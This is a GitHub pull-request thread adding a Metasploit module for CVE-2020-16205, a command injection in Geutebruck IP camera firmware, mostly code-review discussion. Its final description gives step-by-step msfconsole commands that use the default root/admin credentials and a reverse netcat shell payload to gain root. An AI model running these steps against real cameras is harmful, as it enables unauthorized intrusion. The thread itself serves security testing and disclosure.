Add CVE-2020-16205 exploit for Geutebruck G-CAM #13986
Conversation
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Removing documentation tag for now, however the documentation will need updating from my quick look over it as it does not completely follow the expected standards. Shouldn't be too hard to fix it up though, thanks for adding this in @ddouhine! |
gwillcox-r7
added
docs
needs-linting
|
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit: You can automate most of these changes with the Please update your branch after these have been made, and reach out if you have any problems. |
|
Please also run |
|
thx @gwillcox-r7 and @bcoles for reviewing this PR and for your help 👍 |
Np, here to help :) |
|
@ddouhine Reviewed the PCAP that you sent to the msfdev email account and it appears to be good, can see no errors with what you have sent there and everything matches what was shown in the module overview. Happy to consider this module as tested based on this info. I will likely be making some more comments shortly for some issues that I can't fix myself, then will be applying some fixes to your code to fix up some of the issues that @bcoles mentioned as well as some other issues r.e spelling and grammar that I noticed whilst reviewing this PR. |
it should be better now :)
or now... (forgot the msftidy_docs just before)
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: bcoles <bcoles@gmail.com>
Co-authored-by: bcoles <bcoles@gmail.com>
Fixed rubocop offenses / msftidy warnings and added @bcoles enhancements.
gwillcox-r7
force-pushed
the
geutebruck_exploit
branch
from
e84b29b
to
959689d
Compare
|
@ddouhine Just realized your branch is way behind the latest updates for Metasploit, so the last update just rebased your branch against |
…on vulnerability with no chance of crashing the host
documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md
Outdated
Show resolved
Hide resolved
… Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work
gwillcox-r7
removed
the
needs-linting
…sh and to also include the actual versions of the products that were affected in addition to the firmware versions. This prevents people from having to read the documentation to find affected targets
…to add in missing information about affected parameters
|
@ddouhine Alright should just be two more things to complete before we can test this out: the documentation as mentioned above, and then the improvements to the version check so that it uses |
with the updated check using `Gem::Version`
|
Improvements implemented in the version check @gwillcox-r7 ! And I've updated the documentation with the device name device edition firmware version. Nothing to add for me on the documentation, seems complete to me. |
|
@ddouhine Gah so close man, but unfortunately with your new Otherwise the new |
Oops sorry, don't know what this "return true" was doing there.
|
Check seems ok. With 1.12.0.27 (not vulnerable): With 1.12.14.5 (vulnerable): |
|
Code fix is still incorrect, I'll rewrite this so long. Give me a sec. |
|
Really ?? Feel so dumb... Well thx for your help in advance |
Don't feel bad, happens to all of us sometimes 👍 I think you'll get it pretty quick after I push the patch up. Edit: Actually the real issue was something else entirely. I'll explain after I patch this up. Sorry for the confusion 😓 |
… status if the connection fails
|
Ok so last commit should alter the logic a bit so that your |
|
Last thing that may be helpful for this exploit is to include the AutoCheck mixin which will ensure that the exploit only attempts to trigger the bug if the target is determined to be vulnerable via the I'll add this in so long, should give this a little more flexibility and assurance for pentesters 😄 |
…e attempting to exploit them.
|
Hmm now check is not working for me :/ I should be tired. Will have a look later. |
|
@ddouhine Gah that was my bad. I messed that up, will fix it now. |
…s I tried calling the nonexistant method .true?
|
Ok that should fix it. Sorry I was trying to simplify the logic by calling something similar to |
And a fix for the fix ;) I guess now everything will work as intended !
|
@ddouhine Whoops sorry, good spot! |
|
Do you need anything else from me ? |
|
@ddouhine I think there is one minor thing with the documentation but otherwise this is good to land. Let me fix that up so long and get this landed into the framework 👍 |
…ame and password could be something other than root/admin
gwillcox-r7
changed the title
|
@ddouhine Merged, thanks a ton for your patience on the edits and for submitting this PR! |
|
Original Release Notes |
adfoster-r7
added
the
rn-modules
Release NotesNew module |
|
@ddouhine ,If you still have pcap for this scenario ,Can you pls share it |
This exploit a simple OS command injection (CVE-2020-16205) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
Unfortunately I haven't been able to test this module against any of them except Geutebruck.
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 and a blogpost about the issue: https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/
A web server runs on the product to offer video streaming and configuration management and the web interface have an OS command injection vulnerability in the
/uapi-cgi/admin/testaction.cgipage used for the TCP/IP configuration.The setup pages need authentication to be reached but so its not a CVSS 10 but the credentials are not randomized (root/admin by default).
When exploited the vulnerability gives you a root access.
The following firmware are vulnerable:
I've tested it with the 1.12.14.5 firmware only and I've provided you the PCAP by mail.
ps: it's my first module since many years so I guess a few things will be incorrect/missing.
Verification
msfconsoleuse exploit/linux/http/geutebruck_testaction_execset httpusername rootset httppassword adminset lhost 192.168.14.1set rhosts 192.168.14.58set payload cmd/unix/reverse_netcat_gapingcheckexploitDemonstration
check against a vulnerable target (1.12.14.5):
check against a non vulnerable target (1.12.0.27):
exploitation: